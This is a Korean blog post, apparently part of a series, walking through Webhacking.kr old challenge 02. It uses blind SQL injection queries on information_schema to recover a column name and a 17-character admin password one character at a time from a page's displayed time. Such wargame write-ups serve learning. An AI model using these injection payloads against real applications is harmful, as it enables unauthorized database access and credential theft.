2번째 포스팅에서 컬럼 갯수를 확인하였고 컬럼명의 길이를 구하는 과정에서 막혀 3번째 포스팅까지 오게되었습니다.. 2번째 포스팅 할 때는 죽어도 안 되더니 포스팅 할려고 쿼리문을 삽입해보니.. 잘 되는

5. 첫 번째 테이블의 컬럼명의 길이 구하기구하기
select length(column_name) from information_schema.columns where table_name="admin_area_pw"


테이블의 컬럼 명의 글자 수는 2글자로 확인됩니다.
6. 첫 번째 테이블의 컬럼명 구하기
(select ascii(substring(column_name, 1, 1)) from information_schema.columns where table_name="admin_area_pw")


01:52초가 출력되었네요 01:52 -> 112sec -> ascii 코드 'p'
(select ascii(substring(column_name, 2, 1)) from information_schema.columns where table_name="admin_area_pw")


01:59초가 출력되었네요 01:59 -> 119sec -> ascii 코드 'w'
7. Value의 글자 수 구하기


Value 값의 글자 수는 17글자로 확인됩니다.
앞서 테이블명을 구했던 것 처럼 ascii 코드로 출력하여 패스워드로 추측되는 Value 값을 얻어보려 합니다.
8. Value 값 구하기
select ascii(substring(**, 1, 1)) from ad***********


01:47 -> 107 -> ascii 'k'
select ascii(substring(**, 2, 1)) from ad***********


01:57 -> 117 -> ascii 'u'
select ascii(substring(**, 3, 1)) from ad***********


01:40 -> 100 -> ascii 'd'
...
select ascii(substring(**, 17, 1)) from ad***********
노가다로 17번째까지 하여 Value 값을 구했습니다.
앞에서 구한 Value 값을 admin.php의 Password로 제출 해보겠습니다.


Challenge 02번 Clear !!!


생각해보니 기본적인 웹 해킹에 쩔쩔맨 제 모습이 한심합니다...
다시 한 번 DB에 대해서 공부를 해야겠다는 경각심이 듭니다
다음은 3번 챌린지로 돌아오겠습니다!!!
허접한 글을 봐주시느라 정말 고생이 많으셨습니다

'4. Web Hacking > 1. Webhacking.kr' 카테고리의 다른 글
| Challenge(old) - 05 (0) | 2022.02.04 |
|---|---|
| Challenge(old) - 03 (0) | 2022.02.04 |
| Challenge(old) - 02 Part.2 (0) | 2022.02.04 |
| Challenge(old) - 02 (0) | 2022.02.04 |
| Challenge(old) - 01 (0) | 2022.02.04 |